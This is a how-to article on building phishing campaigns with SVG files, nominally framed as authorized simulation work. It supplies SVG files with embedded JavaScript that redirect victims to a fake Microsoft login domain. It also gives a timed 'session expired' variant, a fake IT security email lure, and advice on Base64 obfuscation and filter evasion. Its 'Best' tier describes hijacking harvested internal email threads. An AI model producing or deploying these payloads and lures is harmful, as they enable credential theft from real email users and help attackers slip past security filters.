Incorporating Scalable Vector Graphics (SVG) in Phishing Campaigns

Scalable Vector Graphics (SVG) have emerged as a potent tool in the world of phishing, primarily due to their ability to blend content delivery with complex scripting capabilities. What makes SVGs particularly attractive is their inherent browser compatibility and ability to embed almost any form of content, from JavaScript payloads to phishing links. SVGs can be used to circumvent traditional security mechanisms that often flag more familiar formats such as executables or Microsoft Office documents. By the end of this article, you’ll appreciate why SVGs are a popular choice among threat actors for delivering payloads and how to leverage them effectively in authorized simulated phishing engagements to expose vulnerabilities before attackers do.

A successful campaign with SVGs depends heavily on mimicking normal user interactions and environments convincingly. A high-yield execution doesn’t just trick users into opening a file—it roots itself in plausibility, making the recipient believe that this scripting-enabled vector image is a genuine part of their workflow. After reading, you’ll be equipped to craft SVG-based phishing lures that bypass filters and engage users convincingly.

Prerequisites and Setup

Before embarking on an SVG phishing campaign, having the right toolkit and an appropriate setup is critical. The tools you’ll need include software for creating and editing SVG files like Inkscape or Adobe Illustrator, and a text editor for embedding scripts into the SVGs such as Visual Studio Code or Sublime Text. Optionally, web development tools like XAMPP for local server deployment can offer sandbox testing environments.

You’ll also need a platform for sending phishing emails. GoPhish is recommended due to its robust features and flexible configuration. Ensure your SMTP server is properly configured to avoid spam filters by setting up SPF and DKIM records on your domain. For embedding scripts, having knowledge of JavaScript and HTML is vital since SVGs function much like web pages, and this understanding will allow you to tailor content dynamically.

Confirm that your target environment is adequately researched to ensure the SVGs appear standard and unthreatening. This setup phase is essential because poor initial setup increases detection risk, reducing the exercise’s learning potential.

Step-by-Step Execution

Creating the Malicious SVG

To start, create a base SVG using a tool like Inkscape. Add a simple graphical element, like a company logo, to disguise its true intent. Next, open the SVG file in a text editor and embed a JavaScript payload. Here’s a sample script that redirects users to a phishing site:


<svg xmlns="http://www.w3.org/2000/svg" width="500" height="500">

    <script type="text/javascript">

        <![CDATA[

            document.location.href='https://login.microsoft.phishingsite.com';

        ]]>

    </script>

    <circle cx="250" cy="250" r="200" fill="blue"/>

</svg>

This SVG includes a simple JavaScript redirection targeting a phishing domain. The

circle

element serves as visual camouflage, making it appear like a legitimate SVG file.

Embedding SVG in an Email

Use your phishing platform to draft the campaign email. The email should incorporate the SVG as an attachment or include it inline. An engaging subject line and email body can significantly increase conversion rates:


Subject: Action Required: Security Update on Your Account!



Dear User,



We've detected unusual login attempts to your account. For your safety, please verify your account information by viewing the attached document.



If you have any questions, feel free to contact our support team.



Best Regards,

Your IT Department

This email replicates common corporate communication patterns to avoid raising suspicion. Ensure the SVG file is attached and that any automated email protection isn’t triggered by the attachment format.

Testing and Launch

Before deployment, internally test the SVG file by opening it within sandboxed browsers to verify correct functioning of the JavaScript. For increased stealth, test against sandboxed email platforms to ensure deliverability. Launch by selecting users carefully and monitor interaction through your phishing platform, tracking click-through rates and payload execution feedback.

Advanced Variations

For greater effectiveness, consider embedding dynamic scripting within the SVG. For example, you could add a countdown timer prompting the user to act quickly:


<script type="text/javascript">

    <![CDATA[

        setTimeout(() => {

            alert("Your session has expired. Please log in again.");

            document.location.href='https://secure-login.microsoft.com';

        }, 10000); // 10 seconds timer

    ]]>

</script>

This adds a sense of urgency, aligning with typical security protocol behaviors to boost user engagement.

Another variant involves obfuscating the JavaScript within the SVG using techniques like Base64 encoding. This not only reduces the chance of detection but also complicates reverse-engineering the attack vector.

Good / Better / Best

Good: A basic SVG file with visible scripting. While this might work, it’s detectable by any decent anti-virus scanning attachments for active scripts. For instance, a simple redirect script without any obfuscation won’t pass rigorous checks but can serve well in environments with outdated security measures.

Better: An SVG that includes obfuscated scripts and a carefully composed email message. This setup ensures the script isn’t immediately flagged, presenting a plausible document that aligns with the recipient’s typical work topics or security alerts, enhancing click-through likelihood.

Best: A highly dynamic SVG leveraging both obfuscation and contextual awareness. Target it within a legitimate-looking email chain using internally harvested email headers and conversation threads to blend in perfectly with usual email traffic. This approach ensures not only high interaction but also evades heuristic and pattern-based detection techniques.

Related Concepts

Incorporating SVG files in phishing campaigns is just one aspect of payload delivery through unconventional routes. Understanding and exploring other file-based smuggling tactics like HTML smuggling can provide additional avenues for payload delivery. Furthermore, modifying file formats to adjust for security control evasion is a skill that can cross-apply to delivering payloads in numerous ways, increasing your versatility in creating these engagements.